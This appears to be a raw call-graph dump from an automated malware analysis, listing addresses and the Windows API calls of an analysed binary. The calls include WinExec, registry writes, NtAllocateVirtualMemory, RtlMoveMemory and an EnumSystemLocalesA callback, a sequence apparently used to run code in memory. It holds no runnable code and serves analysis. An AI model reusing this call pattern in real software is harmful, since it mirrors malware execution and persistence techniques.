84622->84623 84624 15682134 84623->84624 84624->84318 84953 156820df 84625->84953 84627 1569be2e 84631 1569bea0 84627->84631 84639 15681fe2 28 API calls 84627->84639 84642 15681fd8 11 API calls 84627->84642 84646 1569be9e 84627->84646 84957 156841a2 28 API calls 84627->84957 84958 1569ce34 28 API calls 84627->84958 84628 15681fd8 11 API calls 84629 1569bed0 84628->84629 84630 15681fd8 11 API calls 84629->84630 84632 1569bed8 84630->84632 84959 156841a2 28 API calls 84631->84959 84635 15681fd8 11 API calls 84632->84635 84637 1568ea24 84635->84637 84636 1569beac 84638 15681fe2 28 API calls 84636->84638 84647 1568fb17 84637->84647 84640 1569beb5 84638->84640 84639->84627 84641 15681fd8 11 API calls 84640->84641 84643 1569bebd 84641->84643 84642->84627 84960 1569ce34 28 API calls 84643->84960 84646->84628 84648 1568fb23 84647->84648 84650 1568fb2a 84647->84650 84961 15682163 11 API calls 84648->84961 84650->84323 84652 15682163 84651->84652 84656 1568219f 84652->84656 84962 15682730 11 API calls 84652->84962 84654 15682184 84963 15682712 11 API calls std::_Deallocate 84654->84963 84656->84325 84658 15681e6d 84657->84658 84660 15681e75 84658->84660 84964 15682158 22 API calls 84658->84964 84660->84330 84663 156820df 11 API calls 84662->84663 84664 1568532a 84663->84664 84965 156832a0 84664->84965 84666 15685346 84666->84338 84970 156851ef 84667->84970 84856->84331 84857->84339 84858->84343 84899 1568f3de 84898->84899 84900 1569b4c5 LoadResource LockResource SizeofResource 84898->84900 84901 156bbd51 84899->84901 84900->84899 84902 156c6137 84901->84902 84903 156c6175 84902->84903 84905 156c6160 HeapAlloc 84902->84905 84908 156c6149 __Getctype 84902->84908 84920 156c05dd 20 API calls __dosmaperr 84903->84920 84907 156c6173 84905->84907 84905->84908 84906 156c617a 84906->84608 84907->84906 84908->84903 84908->84905 84919 156c2f80 7 API calls 2 library calls 84908->84919 84911 156820bf 84910->84911 84921 156823ce 84911->84921 84913 156820ca 84925 1568250a 84913->84925 84915 156820d9 84915->84611 84917 156820b7 28 API calls 84916->84917 84918 15686dec 84917->84918 84918->84618 84919->84908 84920->84906 84922 156823d8 84921->84922 84923 15682428 84921->84923 84922->84923 84932 156827a7 11 API calls std::_Deallocate 84922->84932 84923->84913 84926 1568251a 84925->84926 84927 15682520 84926->84927 84928 15682535 84926->84928 84933 15682569 84927->84933 84943 156828e8 28 API calls 84928->84943 84931 15682533 84931->84915 84932->84923 84944 15682888 84933->84944 84935 1568257d 84936 15682592 84935->84936 84937 156825a7 84935->84937 84949 15682a34 22 API calls 84936->84949 84951 156828e8 28 API calls 84937->84951 84940 1568259b 84950 156829da 22 API calls 84940->84950 84942 156825a5 84942->84931 84943->84931 84945 15682890 84944->84945 84946 15682898 84945->84946 84952 15682ca3 22 API calls 84945->84952 84946->84935 84949->84940 84950->84942 84951->84942 84954 156820e7 84953->84954 84955 156823ce 11 API calls 84954->84955 84956 156820f2 84955->84956 84956->84627 84957->84627 84958->84627 84959->84636 84960->84646 84961->84650 84962->84654 84963->84656 84967 156832aa 84965->84967 84966 156832c9 84966->84666 84967->84966 84969 156828e8 28 API calls 84967->84969 84969->84966 84971 156851fb 84970->84971 84980 15685274 84971->84980 84981 15685282 84980->84981 84984 156828a4 22 API calls 84981->84984 85162 2e04efe 85163 2de4824 11 API calls 85162->85163 85164 2e04f1f 85163->85164 85165 2de47b0 11 API calls 85164->85165 85166 2e04f56 85165->85166 85167 2df7be8 17 API calls 85166->85167 85168 2e04f7a 85167->85168 85169 2de4824 11 API calls 85168->85169 85170 2e04f9b 85169->85170 85171 2de47b0 11 API calls 85170->85171 85172 2e04fd2 85171->85172 85173 2df7be8 17 API calls 85172->85173 85174 2e04ff6 85173->85174 85175 2de4824 11 API calls 85174->85175 85176 2e05017 85175->85176 85177 2de47b0 11 API calls 85176->85177 85178 2e0504e 85177->85178 85179 2df7be8 17 API calls 85178->85179 85180 2e05072 85179->85180 85181 2de4824 11 API calls 85180->85181 85182 2e05093 85181->85182 85183 2de47b0 11 API calls 85182->85183 85184 2e050ca 85183->85184 85185 2df7be8 17 API calls 85184->85185 85186 2e050ee 85185->85186 85187 2de4824 11 API calls 85186->85187 85188 2e0510f 85187->85188 85189 2de47b0 11 API calls 85188->85189 85190 2e05146 85189->85190 85191 2df7be8 17 API calls 85190->85191 85192 2e0516a 85191->85192 85193 2de4824 11 API calls 85192->85193 85194 2e051a4 85193->85194 85890 2dfd318 85194->85890 85197 2de4824 11 API calls 85198 2e05211 85197->85198 85199 2de47b0 11 API calls 85198->85199 85200 2e05248 85199->85200 85201 2df7be8 17 API calls 85200->85201 85202 2e0526c 85201->85202 85203 2de4824 11 API calls 85202->85203 85204 2e0528d 85203->85204 85205 2de47b0 11 API calls 85204->85205 85206 2e052c4 85205->85206 85207 2df7be8 17 API calls 85206->85207 85208 2e052e8 85207->85208 85209 2de4824 11 API calls 85208->85209 85210 2e05309 85209->85210 85211 2de47b0 11 API calls 85210->85211 85212 2e05340 85211->85212 85213 2df7be8 17 API calls 85212->85213 85214 2e05364 85213->85214 85215 2de4824 11 API calls 85214->85215 85216 2e05385 85215->85216 85217 2de47b0 11 API calls 85216->85217 85218 2e053bc 85217->85218 85219 2df7be8 17 API calls 85218->85219 85220 2e053e0 85219->85220 85221 2de4824 11 API calls 85220->85221 85222 2e05401 85221->85222 85223 2de47b0 11 API calls 85222->85223 85224 2e05438 85223->85224 85225 2df7be8 17 API calls 85224->85225 85226 2e0545c 85225->85226 85227 2de4824 11 API calls 85226->85227 85228 2e0547d 85227->85228 85229 2de47b0 11 API calls 85228->85229 85230 2e054b4 85229->85230 85231 2df7be8 17 API calls 85230->85231 85232 2e054d8 85231->85232 85233 2de4824 11 API calls 85232->85233 85234 2e054f9 85233->85234 85235 2de47b0 11 API calls 85234->85235 85236 2e05530 85235->85236 85237 2df7be8 17 API calls 85236->85237 85238 2e05554 85237->85238 85239 2de4824 11 API calls 85238->85239 85240 2e05575 85239->85240 85241 2de47b0 11 API calls 85240->85241 85242 2e055ac 85241->85242 85243 2df7be8 17 API calls 85242->85243 85244 2e055d0 85243->85244 85245 2de4824 11 API calls 85244->85245 85246 2e055f1 85245->85246 85247 2de47b0 11 API calls 85246->85247 85248 2e05628 85247->85248 85249 2df7be8 17 API calls 85248->85249 85250 2e0564c 85249->85250 85251 2e06190 85250->85251 85252 2e05661 85250->85252 85254 2de4824 11 API calls 85251->85254 85253 2de4824 11 API calls 85252->85253 85256 2e05682 85253->85256 85255 2e061b1 85254->85255 85257 2de47b0 11 API calls 85255->85257 85258 2de47b0 11 API calls 85256->85258 85260 2e061e8 85257->85260 85259 2e056b9 85258->85259 85261 2df7be8 17 API calls 85259->85261 85262 2df7be8 17 API calls 85260->85262 85263 2e056dd 85261->85263 85264 2e0620c 85262->85264 85265 2de4824 11 API calls 85263->85265 85266 2de4824 11 API calls 85264->85266 85268 2e056fe 85265->85268 85267 2e0622d 85266->85267 85269 2de47b0 11 API calls 85267->85269 85270 2de47b0 11 API calls 85268->85270 85272 2e06264 85269->85272 85271 2e05735 85270->85271 85273 2df7be8 17 API calls 85271->85273 85274 2df7be8 17 API calls 85272->85274 85275 2e05759 85273->85275 85276 2e06288 85274->85276 85277 2de4824 11 API calls 85275->85277 85278 2de4824 11 API calls 85276->85278 85279 2e0577a 85277->85279 85280 2e062a9 85278->85280 85282 2de47b0 11 API calls 85279->85282 85281 2de47b0 11 API calls 85280->85281 85283 2e062e0 85281->85283 85284 2e057b1 85282->85284 85286 2df7be8 17 API calls 85283->85286 85285 2df7be8 17 API calls 85284->85285 85287 2e057d5 85285->85287 85288 2e06304 85286->85288 85289 2de47b0 11 API calls 85287->85289 85290 2de4824 11 API calls 85288->85290 85291 2e057ed 85289->85291 85294 2e06325 85290->85294 85292 2e057f8 WinExec 85291->85292 85293 2de4824 11 API calls 85292->85293 85296 2e0581f 85293->85296 85295 2de47b0 11 API calls 85294->85295 85297 2e0635c 85295->85297 85298 2de47b0 11 API calls 85296->85298 85299 2df7be8 17 API calls 85297->85299 85300 2e05856 85298->85300 85303 2e06380 85299->85303 85301 2df7be8 17 API calls 85300->85301 85304 2e0587a 85301->85304 85302 2e06b54 85305 2de4824 11 API calls 85302->85305 85303->85302 85306 2de4824 11 API calls 85303->85306 85307 2de4824 11 API calls 85304->85307 85308 2e06b75 85305->85308 85309 2e063b6 85306->85309 85310 2e0589b 85307->85310 85311 2de47b0 11 API calls 85308->85311 85312 2de47b0 11 API calls 85309->85312 85313 2de47b0 11 API calls 85310->85313 85314 2e06bac 85311->85314 85315 2e063ed 85312->85315 85316 2e058d2 85313->85316 85317 2df7be8 17 API calls 85314->85317 85318 2df7be8 17 API calls 85315->85318 85319 2df7be8 17 API calls 85316->85319 85320 2e06bd0 85317->85320 85321 2e06411 85318->85321 85322 2e058f6 85319->85322 85323 2de4824 11 API calls 85320->85323 85324 2de4824 11 API calls 85321->85324 85325 2de4824 11 API calls 85322->85325 85326 2e06bf1 85323->85326 85327 2e06432 85324->85327 85328 2e05917 85325->85328 85329 2de47b0 11 API calls 85326->85329 85330 2de47b0 11 API calls 85327->85330 85331 2de47b0 11 API calls 85328->85331 85332 2e06c28 85329->85332 85333 2e06469 85330->85333 85334 2e0594e 85331->85334 85335 2df7be8 17 API calls 85332->85335 85336 2df7be8 17 API calls 85333->85336 85339 2df7be8 17 API calls 85334->85339 85337 2e06c4c 85335->85337 85338 2e0648d 85336->85338 85340 2de4824 11 API calls 85337->85340 85341 2de4824 11 API calls 85338->85341 85342 2e05972 85339->85342 85343 2e06c6d 85340->85343 85344 2e064ae 85341->85344 85909 2df9e70 29 API calls 85342->85909 85347 2de47b0 11 API calls 85343->85347 85348 2de47b0 11 API calls 85344->85348 85346 2e05999 85349 2de4824 11 API calls 85346->85349 85350 2e06ca4 85347->85350 85351 2e064e5 85348->85351 85352 2e059ba 85349->85352 85353 2df7be8 17 API calls 85350->85353 85354 2df7be8 17 API calls 85351->85354 85356 2de47b0 11 API calls 85352->85356 85363 2e06cc8 85353->85363 85355 2e06509 85354->85355 85357 2de4824 11 API calls 85355->85357 85359 2e059f1 85356->85359 85361 2e0652a 85357->85361 85358 2e074a8 85360 2de4824 11 API calls 85358->85360 85362 2df7be8 17 API calls 85359->85362 85368 2e074c9 85360->85368 85366 2de47b0 11 API calls 85361->85366 85364 2e05a15 85362->85364 85363->85358 85365 2de4824 11 API calls 85363->85365 85367 2de4824 11 API calls 85364->85367 85370 2e06d13 85365->85370 85371 2e06561 85366->85371 85372 2e05a36 85367->85372 85369 2de47b0 11 API calls 85368->85369 85376 2e07500 85369->85376 85373 2de47b0 11 API calls 85370->85373 85374 2df7be8 17 API calls 85371->85374 85377 2de47b0 11 API calls 85372->85377 85380 2e06d4a 85373->85380 85375 2e06585 85374->85375 85378 2de4824 11 API calls 85375->85378 85379 2df7be8 17 API calls 85376->85379 85383 2e05a6d 85377->85383 85385 2e065a6 85378->85385 85381 2e07524 85379->85381 85384 2df7be8 17 API calls 85380->85384 85382 2de4824 11 API calls 85381->85382 85394 2e07545 85382->85394 85386 2df7be8 17 API calls 85383->85386 85387 2e06d6e 85384->85387 85390 2de47b0 11 API calls 85385->85390 85388 2e05a91 85386->85388 85389 2de4824 11 API calls 85387->85389 85391 2de4824 11 API calls 85388->85391 85392 2e06d8f 85389->85392 85393 2e065dd 85390->85393 85395 2e05ab2 85391->85395 85397 2de47b0 11 API calls 85392->85397 85398 2df7be8 17 API calls 85393->85398 85396 2de47b0 11 API calls 85394->85396 85399 2de47b0 11 API calls 85395->85399 85401 2e0757c 85396->85401 85404 2e06dc6 85397->85404 85400 2e06601 85398->85400 85407 2e05ae9 85399->85407 85402 2de4824 11 API calls 85400->85402 85403 2df7be8 17 API calls 85401->85403 85409 2e06622 85402->85409 85405 2e075a0 85403->85405 85408 2df7be8 17 API calls 85404->85408 85406 2de4824 11 API calls 85405->85406 85415 2e075c1 85406->85415 85411 2df7be8 17 API calls 85407->85411 85410 2e06dea 85408->85410 85413 2de47b0 11 API calls 85409->85413 85412 2de4824 11 API calls 85410->85412 85414 2e05b0d 85411->85414 85418 2e06e0b 85412->85418 85419 2e06659 85413->85419 85416 2de4824 11 API calls 85414->85416 85417 2de47b0 11 API calls 85415->85417 85422 2e05b4d 85416->85422 85424 2e075f8 85417->85424 85420 2de47b0 11 API calls 85418->85420 85421 2df7be8 17 API calls 85419->85421 85429 2e06e42 85420->85429 85423 2e0667d 85421->85423 85426 2de47b0 11 API calls 85422->85426 85425 2de2ee0 2 API calls 85423->85425 85428 2df7be8 17 API calls 85424->85428 85427 2e06682 85425->85427 85434 2e05b84 85426->85434 85431 2de4824 11 API calls 85427->85431 85433 2e0761c 85428->85433 85430 2df7be8 17 API calls 85429->85430 85432 2e06e66 85430->85432 85440 2e066bb 85431->85440 85912 2dfd198 85432->85912 85437 2df7be8 17 API calls 85433->85437 85438 2df7be8 17 API calls 85434->85438 85444 2e0764f 85437->85444 85441 2e05ba8 85438->85441 85439 2de4824 11 API calls 85445 2e06eaa 85439->85445 85443 2de47b0 11 API calls 85440->85443 85442 2de4824 11 API calls 85441->85442 85446 2e05bc9 85442->85446 85449 2e066f2 85443->85449 85447 2df7be8 17 API calls 85444->85447 85448 2de4824 11 API calls 85445->85448 85450 2de47b0 11 API calls 85446->85450 85453 2e07682 85447->85453 85454 2e06ee2 85448->85454 85451 2df7be8 17 API calls 85449->85451 85457 2e05c00 85450->85457 85452 2e06716 85451->85452 85455 2de4824 11 API calls 85452->85455 85456 2df7be8 17 API calls 85453->85456 85458 2de47b0 11 API calls 85454->85458 85460 2e06737 85455->85460 85462 2e076b5 85456->85462 85459 2df7be8 17 API calls 85457->85459 85464 2e06f19 85458->85464 85461 2e05c24 85459->85461 85465 2de47b0 11 API calls 85460->85465 85463 2de4824 11 API calls 85461->85463 85466 2df7be8 17 API calls 85462->85466 85469 2e05c45 85463->85469 85467 2df7be8 17 API calls 85464->85467 85473 2e0676e 85465->85473 85468 2e076e8 85466->85468 85470 2e06f3d 85467->85470 85471 2de4824 11 API calls 85468->85471 85474 2de47b0 11 API calls 85469->85474 85472 2de4824 11 API calls 85470->85472 85477 2e07709 85471->85477 85478 2e06f5e 85472->85478 85475 2df7be8 17 API calls 85473->85475 85480 2e05c7c 85474->85480 85476 2e06792 85475->85476 85479 2de4824 11 API calls 85476->85479 85481 2de47b0 11 API calls 85477->85481 85482 2de47b0 11 API calls 85478->85482 85484 2e067b3 85479->85484 85483 2df7be8 17 API calls 85480->85483 85486 2e07740 85481->85486 85487 2e06f95 85482->85487 85485 2e05ca0 85483->85485 85488 2de47b0 11 API calls 85484->85488 85910 2df5aa8 42 API calls 85485->85910 85490 2df7be8 17 API calls 85486->85490 85492 2df7be8 17 API calls 85487->85492 85498 2e067ea 85488->85498 85493 2e07764 85490->85493 85491 2e05ccc 85496 2de4b90 11 API calls 85491->85496 85494 2e06fb9 85492->85494 85495 2de4824 11 API calls 85493->85495 85919 2de7e18 85494->85919 85508 2e07785 85495->85508 85499 2e05ce1 85496->85499 85504 2df7be8 17 API calls 85498->85504 85501 2de4824 11 API calls 85499->85501 85512 2e05d02 85501->85512 85502 2e072a2 85507 2de4824 11 API calls 85502->85507 85503 2e06fcb 85505 2de4824 11 API calls 85503->85505 85506 2e0680e GetCurrentProcess 85504->85506 85514 2e06fec 85505->85514 85902 2df7968 GetModuleHandleW GetProcAddress NtAllocateVirtualMemory 85506->85902 85515 2e072c3 85507->85515 85511 2de47b0 11 API calls 85508->85511 85510 2e06828 85513 2de4824 11 API calls 85510->85513 85518 2e077bc 85511->85518 85516 2de47b0 11 API calls 85512->85516 85520 2e0684e 85513->85520 85519 2de47b0 11 API calls 85514->85519 85517 2de47b0 11 API calls 85515->85517 85524 2e05d39 85516->85524 85526 2e072fa 85517->85526 85521 2df7be8 17 API calls 85518->85521 85525 2e07023 85519->85525 85522 2de47b0 11 API calls 85520->85522 85523 2e077e0 85521->85523 85533 2e06885 85522->85533 85527 2de4824 11 API calls 85523->85527 85528 2df7be8 17 API calls 85524->85528 85530 2df7be8 17 API calls 85525->85530 85531 2df7be8 17 API calls 85526->85531 85537 2e07801 85527->85537 85529 2e05d5d 85528->85529 85538 2de49bc 11 API calls 85529->85538 85532 2e07047 85530->85532 85534 2e0731e 85531->85534 85535 2de4824 11 API calls 85532->85535 85539 2df7be8 17 API calls 85533->85539 85536 2de4824 11 API calls 85534->85536 85545 2e07068 85535->85545 85546 2e0733f 85536->85546 85542 2de47b0 11 API calls 85537->85542 85540 2e05d7a RtlMoveMemory 85538->85540 85541 2e068a9 85539->85541 85543 2de4824 11 API calls 85540->85543 85544 2de4824 11 API calls 85541->85544 85549 2e07838 85542->85549 85550 2e05da1 85543->85550 85551 2e068ca 85544->85551 85547 2de47b0 11 API calls 85545->85547 85548 2de47b0 11 API calls 85546->85548 85555 2e0709f 85547->85555 85556 2e07376 85548->85556 85552 2df7be8 17 API calls 85549->85552 85554 2de47b0 11 API calls 85550->85554 85553 2de47b0 11 API calls 85551->85553 85559 2e0785c 85552->85559 85562 2e06901 85553->85562 85560 2e05dd8 85554->85560 85557 2df7be8 17 API calls 85555->85557 85558 2df7be8 17 API calls 85556->85558 85561 2e070c3 85557->85561 85563 2e0739a 85558->85563 85566 2df7be8 17 API calls 85559->85566 85567 2df7be8 17 API calls 85560->85567 85564 2de4824 11 API calls 85561->85564 85568 2df7be8 17 API calls 85562->85568 85565 2de4824 11 API calls 85563->85565 85573 2e070e4 85564->85573 85574 2e073bb 85565->85574 85575 2e0788f 85566->85575 85569 2e05dfc 85567->85569 85570 2e06925 85568->85570 85571 2de4824 11 API calls 85569->85571 85572 2de4824 11 API calls 85570->85572 85579 2e05e1d 85571->85579 85580 2e06946 85572->85580 85576 2de47b0 11 API calls 85573->85576 85577 2de47b0 11 API calls 85574->85577 85578 2df7be8 17 API calls 85575->85578 85585 2e0711b 85576->85585 85583 2e073f2 85577->85583 85584 2e078c2 85578->85584 85581 2de47b0 11 API calls 85579->85581 85582 2de47b0 11 API calls 85580->85582 85592 2e05e54 85581->85592 85590 2e0697d 85582->85590 85587 2df7be8 17 API calls 85583->85587 85588 2df7be8 17 API calls 85584->85588 85586 2df7be8 17 API calls 85585->85586 85589 2e0713f 85586->85589 85591 2e07416 85587->85591 85601 2e078f5 85588->85601 85923 2dfc74c 85589->85923 85597 2df7be8 17 API calls 85590->85597 85594 2de4824 11 API calls 85591->85594 85595 2df7be8 17 API calls 85592->85595 85606 2e07437 85594->85606 85598 2e05e78 85595->85598 85600 2e069a1 85597->85600 85602 2de4824 11 API calls 85598->85602 85599 2de44f4 11 API calls 85603 2e07164 85599->85603 85903 2de49bc 85600->85903 85607 2df7be8 17 API calls 85601->85607 85610 2e05e99 85602->85610 85604 2de4824 11 API calls 85603->85604 85611 2e07185 85604->85611 85609 2de47b0 11 API calls 85606->85609 85613 2e07928 85607->85613 85608 2e069c5 85612 2de4824 11 API calls 85608->85612 85616 2e0746e 85609->85616 85614 2de47b0 11 API calls 85610->85614 85615 2de47b0 11 API calls 85611->85615 85619 2e069f4 85612->85619 85617 2df7be8 17 API calls 85613->85617 85623 2e05ed0 85614->85623 85624 2e071bc 85615->85624 85620 2df7be8 17 API calls 85616->85620 85618 2e0795b 85617->85618 85621 2de4824 11 API calls 85618->85621 85625 2de47b0 11 API calls 85619->85625 85622 2e07492 85620->85622 85631 2e0797c 85621->85631 85626 2de49bc 11 API calls 85622->85626 85628 2df7be8 17 API calls 85623->85628 85629 2df7be8 17 API calls 85624->85629 85636 2e06a2b 85625->85636 85627 2e0749c 85626->85627 85943 2df7f48 35 API calls 85627->85943 85632 2e05ef4 85628->85632 85634 2e071e0 85629->85634 85637 2de47b0 11 API calls 85631->85637 85633 2de4824 11 API calls 85632->85633 85639 2e05f15 85633->85639 85635 2de4824 11 API calls 85634->85635 85641 2e07201 85635->85641 85638 2df7be8 17 API calls 85636->85638 85643 2e079b3 85637->85643 85640 2e06a4f 85638->85640 85644 2de47b0 11 API calls 85639->85644 85642 2de4824 11 API calls 85640->85642 85645 2de47b0 11 API calls 85641->85645 85648 2e06a70 85642->85648 85646 2df7be8 17 API calls 85643->85646 85650 2e05f4c 85644->85650 85652 2e07238 85645->85652 85647 2e079d7 85646->85647 85649 2de4824 11 API calls 85647->85649 85651 2de47b0 11 API calls 85648->85651 85655 2e079f8 85649->85655 85653 2df7be8 17 API calls 85650->85653 85658 2e06aa7 85651->85658 85654 2df7be8 17 API calls 85652->85654 85656 2e05f70 85653->85656 85665 2e0725c 85654->85665 85659 2de47b0 11 API calls 85655->85659 85911 2dfa1c0 51 API calls 85656->85911 85660 2df7be8 17 API calls 85658->85660 85664 2e07a2f 85659->85664 85662 2e06acb 85660->85662 85661 2e05f81 85663 2de4824 11 API calls 85662->85663 85668 2e06aec 85663->85668 85667 2df7be8 17 API calls 85664->85667 85928 2dfc3f8 85665->85928 85670 2e07a53 85667->85670 85669 2de47b0 11 API calls 85668->85669 85673 2e06b23 85669->85673 85671 2df7be8 17 API calls 85670->85671 85672 2e07a86 85671->85672 85674 2de4824 11 API calls 85672->85674 85675 2df7be8 17 API calls 85673->85675 85677 2e07aa7 85674->85677 85676 2e06b47 EnumSystemLocalesA 85675->85676 85676->85302 85678 2de47b0 11 API calls 85677->85678 85679 2e07ade 85678->85679 85680 2df7be8 17 API calls 85679->85680 85681 2e07b02 85680->85681 85682 2de4824 11 API calls 85681->85682 85683 2e07b23 85682->85683 85684 2de47b0 11 API calls 85683->85684 85685 2e07b5a 85684->85685 85686 2df7be8 17 API calls 85685->85686 85687 2e07b7e 85686->85687 85688 2de4824 11 API calls 85687->85688 85689 2e07b9f 85688->85689 85690 2de47b0 11 API calls 85689->85690 85691 2e07bd6 85690->85691 85692 2df7be8 17 API calls 85691->85692 85693 2e07bfa 85692->85693 85694 2df7be8 17 API calls 85693->85694 85695 2e07c2d 85694->85695 85696 2df7be8 17 API calls 85695->85696 85697 2e07c60 85696->85697 85698 2df7be8 17 API calls 85697->85698 85699 2e07c93 85698->85699 85700 2df7be8 17 API calls 85699->85700 85701 2e07cc6 85700->85701 85702 2de4824 11 API calls 85701->85702 85703 2e07ce7 85702->85703 85704 2de47b0 11 API calls 85703->85704 85705 2e07d1e 85704->85705 85706 2df7be8 17 API calls 85705->85706 85707 2e07d42 85706->85707 85708 2de4824 11 API calls 85707->85708 85709 2e07d63 85708->85709 85710 2de47b0 11 API calls 85709->85710 85711 2e07d9a 85710->85711 85712 2df7be8 17 API calls 85711->85712 85713 2e07dbe 85712->85713 85714 2df7be8 17 API calls 85713->85714 85715 2e07df1 85714->85715 85716 2df7be8 17 API calls 85715->85716 85717 2e07e24 85716->85717 85718 2df7be8 17 API calls 85717->85718 85719 2e07e57 85718->85719 85720 2df7be8 17 API calls 85719->85720 85721 2e07e8a 85720->85721 85722 2df7be8 17 API calls 85721->85722 85723 2e07ebd 85722->85723 85724 2de4824 11 API calls 85723->85724 85725 2e07ede 85724->85725 85726 2de47b0 11 API calls 85725->85726 85727 2e07f15 85726->85727 85728 2df7be8 17 API calls 85727->85728 85729 2e07f39 85728->85729 85730 2de4824 11 API calls 85729->85730 85731 2e07f5a 85730->85731 85732 2de47b0 11 API calls 85731->85732 85733 2e07f91 85732->85733 85734 2df7be8 17 API calls 85733->85734 85735 2e07fb5 85734->85735 85736 2de4824 11 API calls 85735->85736 85737 2e07fd6 85736->85737 85738 2de47b0 11 API calls 85737->85738 85739 2e0800d 85738->85739 85740 2df7be8 17 API calls 85739->85740 85741 2e08031 85740->85741 85742 2de4824 11 API calls 85741->85742 85743 2e08052 85742->85743 85744 2de47b0 11 API calls 85743->85744 85745 2e08089 85744->85745 85746 2df7be8 17 API calls 85745->85746 85747 2e080ad 85746->85747 85748 2de4824 11 API calls 85747->85748 85749 2e080ce 85748->85749 85750 2de47b0 11 API calls 85749->85750 85751 2e08105 85750->85751 85752 2df7be8 17 API calls 85751->85752 85753 2e08129 85752->85753 85754 2df7be8 17 API calls 85753->85754 85755 2e08138 85754->85755 85756 2df7be8 17 API calls 85755->85756 85757 2e08147 85756->85757 85758 2df7be8 17 API calls 85757->85758 85759 2e08156 85758->85759 85760 2df7be8 17 API calls 85759->85760 85761 2e08165 85760->85761 85762 2df7be8 17 API calls 85761->85762 85763 2e08174 85762->85763 85764 2df7be8 17 API calls 85763->85764 85765 2e08183 85764->85765 85766 2df7be8 17 API calls 85765->85766 85767 2e08192 85766->85767 85768 2df7be8 17 API calls 85767->85768 85769 2e081a1 85768->85769 85770 2df7be8 17 API calls 85769->85770 85771 2e081b0 85770->85771 85772 2df7be8 17 API calls 85771->85772 85773 2e081bf 85772->85773 85774 2df7be8 17 API calls 85773->85774 85775 2e081ce 85774->85775 85776 2df7be8 17 API calls 85775->85776 85777 2e081dd 85776->85777 85778 2df7be8 17 API calls 85777->85778 85779 2e081ec 85778->85779 85780 2df7be8 17 API calls 85779->85780 85781 2e081fb 85780->85781 85782 2df7be8 17 API calls 85781->85782 85783 2e0820a 85782->85783 85784 2de4824 11 API calls 85783->85784 85785 2e0822b 85784->85785 85786 2de47b0 11 API calls 85785->85786 85787 2e08262 85786->85787 85788 2df7be8 17 API calls 85787->85788 85789 2e08286 85788->85789 85790 2de4824 11 API calls 85789->85790 85791 2e082a7 85790->85791 85792 2de47b0 11 API calls 85791->85792 85793 2e082de 85792->85793 85794 2df7be8 17 API calls 85793->85794 85795 2e08302 85794->85795 85796 2de4824 11 API calls 85795->85796 85797 2e08323 85796->85797 85798 2de47b0 11 API calls 85797->85798 85799 2e0835a 85798->85799 85800 2df7be8 17 API calls 85799->85800 85801 2e0837e 85800->85801 85802 2df7be8 17 API calls 85801->85802 85803 2e083b1 85802->85803 85804 2df7be8 17 API calls 85803->85804 85805 2e083e4 85804->85805 85806 2df7be8 17 API calls 85805->85806 85807 2e08417 85806->85807 85808 2df7be8 17 API calls 85807->85808 85809 2e0844a 85808->85809 85810 2df7be8 17 API calls 85809->85810 85811 2e0847d 85810->85811 85812 2df7be8 17 API calls 85811->85812 85813 2e084b0 85812->85813 85814 2df7be8 17 API calls 85813->85814 85815 2e084e3 85814->85815 85816 2de4824 11 API calls 85815->85816 85817 2e08504 85816->85817 85818 2de47b0 11 API calls 85817->85818 85819 2e0853b 85818->85819 85820 2df7be8 17 API calls 85819->85820 85821 2e0855f 85820->85821 85822 2de4824 11 API calls 85821->85822 85823 2e08580 85822->85823 85824 2de47b0 11 API calls 85823->85824 85825 2e085b7 85824->85825 85826 2df7be8 17 API calls 85825->85826 85827 2e085db 85826->85827 85828 2de4824 11 API calls 85827->85828 85829 2e085fc 85828->85829 85830 2de47b0 11 API calls 85829->85830 85831 2e08633 85830->85831 85832 2df7be8 17 API calls 85831->85832 85833 2e08657 85832->85833 85834 2df7be8 17 API calls 85833->85834 85835 2e0868a 85834->85835 85836 2df7be8 17 API calls 85835->85836 85837 2e086bd 85836->85837 85838 2df7be8 17 API calls 85837->85838 85839 2e086f0 85838->85839 85840 2df7be8 17 API calls 85839->85840 85841 2e08723 85840->85841 85842 2df7be8 17 API calls 85841->85842 85843 2e08756 85842->85843 85844 2df7be8 17 API calls 85843->85844 85845 2e08789 85844->85845 85846 2df7be8 17 API calls 85845->85846 85847 2e087bc 85846->85847 85848 2df7be8 17 API calls 85847->85848 85849 2e087ef 85848->85849 85850 2df7be8 17 API calls 85849->85850 85851 2e08822 85850->85851 85852 2df7be8 17 API calls 85851->85852 85853 2e08855 85852->85853 85854 2df7be8 17 API calls 85853->85854 85855 2e08888 85854->85855 85856 2df7be8 17 API calls 85855->85856 85857 2e088bb 85856->85857 85858 2df7be8 17 API calls 85857->85858 85859 2e088ee 85858->85859 85860 2df7be8 17 API calls 85859->85860 85861 2e08921 85860->85861 85862 2df7be8 17 API calls 85861->85862 85863 2e08954 85862->85863 85864 2df7be8 17 API calls 85863->85864 85865 2e08987 85864->85865 85866 2df7be8 17 API calls 85865->85866 85867 2e089ba 85866->85867 85868 2df7be8 17 API calls 85867->85868 85869 2e089ed 85868->85869 85870 2df7be8 17 API calls 85869->85870 85871 2e08a20 85870->85871 85872 2de4824 11 API calls 85871->85872 85873 2e08a41 85872->85873 85874 2de47b0 11 API calls 85873->85874 85875 2e08a78 85874->85875 85876 2df7be8 17 API calls 85875->85876 85877 2e08a9c 85876->85877 85878 2de4824 11 API calls 85877->85878 85879 2e08abd 85878->85879 85880 2de47b0 11 API calls 85879->85880 85881 2e08af4 85880->85881 85882 2df7be8 17 API calls 85881->85882 85883 2e08b18 85882->85883 85884 2de4824 11 API calls 85883->85884 85885 2e08b39 85884->85885 85886 2de47b0 11 API calls 85885->85886 85887 2e08b70 85886->85887 85888 2df7be8 17 API calls 85887->85888 85889 2e08b94 ExitProcess 85888->85889 85891 2dfd32f 85890->85891 85892 2dfd35a RegOpenKeyA 85891->85892 85893 2dfd368 85892->85893 85894 2de49bc 11 API calls 85893->85894 85895 2dfd380 85894->85895 85896 2dfd38d RegSetValueExA RegCloseKey 85895->85896 85897 2dfd3b1 85896->85897 85898 2de44c4 11 API calls 85897->85898 85899 2dfd3be 85898->85899 85900 2de44a0 11 API calls 85899->85900 85901 2dfd3c6 85900->85901 85901->85197 85902->85510 85904 2de4970 85903->85904 85905 2de49ab 85904->85905 85906 2de4564 11 API calls 85904->85906 85905->85608 85907 2de4987 85906->85907 85907->85905 85944 2de2c2c 11 API calls 85907->85944 85909->85346 85910->85491 85911->85661 85913 2dfd1bd 85912->85913 85914 2dfd1e9 85913->85914 85945 2de4688 11 API calls 85913->85945 85946 2de44f4 11 API calls 85913->85946 85915 2de44a0 11 API calls 85914->85915 85917 2dfd1fe 85915->85917 85917->85439 85920 2de4964 85919->85920 85921 2de7e22 